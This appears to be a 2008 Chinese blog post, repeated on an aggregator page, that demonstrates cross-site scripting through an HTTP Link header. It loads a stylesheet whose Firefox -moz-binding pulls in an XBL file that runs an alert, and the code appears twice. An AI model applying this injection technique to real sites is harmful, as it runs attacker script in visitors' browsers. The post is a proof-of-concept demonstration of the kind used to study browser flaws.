HTTP HEADER IMPORT XSS
2008-08-25 17:43
246 查看
测试了IE 不成功TMD~~~,FF可以!
import.jsp
<%
response.addHeader("Link", "<http://ip:8080/myweb/xss.css> ; REL=stylesheet") ;
%>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<TITLE> xss </TITLE>
</HEAD>
<BODY></BODY>
</HTML>
xss.css
body{-moz-binding:url("http://ip:8080/myweb/1.xml#xss");}
body{background: yellow}
1.xml
<?xml version="1.0"?>
<bindings xmlns="http://www.mozilla.org/xbl" xmlns:html="http://www.w3.org/1999/xhtml">
<binding id="xss">
<implementation>
<constructor>
alert("kj021320");
</constructor>
</implementation>
</binding>
</bindings>
import.jsp
<%
response.addHeader("Link", "<http://ip:8080/myweb/xss.css> ; REL=stylesheet") ;
%>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<TITLE> xss </TITLE>
</HEAD>
<BODY></BODY>
</HTML>
xss.css
body{-moz-binding:url("http://ip:8080/myweb/1.xml#xss");}
body{background: yellow}
1.xml
<?xml version="1.0"?>
<bindings xmlns="http://www.mozilla.org/xbl" xmlns:html="http://www.w3.org/1999/xhtml">
<binding id="xss">
<implementation>
<constructor>
alert("kj021320");
</constructor>
</implementation>
</binding>
</bindings>
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- HTTP HEADER IMPORT XSS
- The type org.apache.http.Header cannot be resolved. 的解决办法
- HTTP Header 详解
- http协议及网页header头应用
- 笔记整理--HTTP Header 详解
- PHP 使用header函数设置HTTP头的示例方法 表头
- Android studio中“import org.apache.http.Header;”没用?
- HTTP2 帧基础知识以及Header、CONTINUATION、DATA帧相关资料:
- HTTP Request的Header信息
- HTTP Range header
- HTTP 请求头 Header
- 不可或缺的xmlhttp.setRequestHeader()
- 在线修改http header
- HTTP Header 详解
- HTTP Header 详解(转)
- HTTP 报文中的 Header 字段进行身份验证
- HTTP协议header标头详解
- 关于http和https允许请求(Nginx)设置header问题
- HTTP Header 详解
- 优雅设计封装基于Okhttp3的网络框架(六):HttpHeader接口设计实现 及 Response、Request封装实现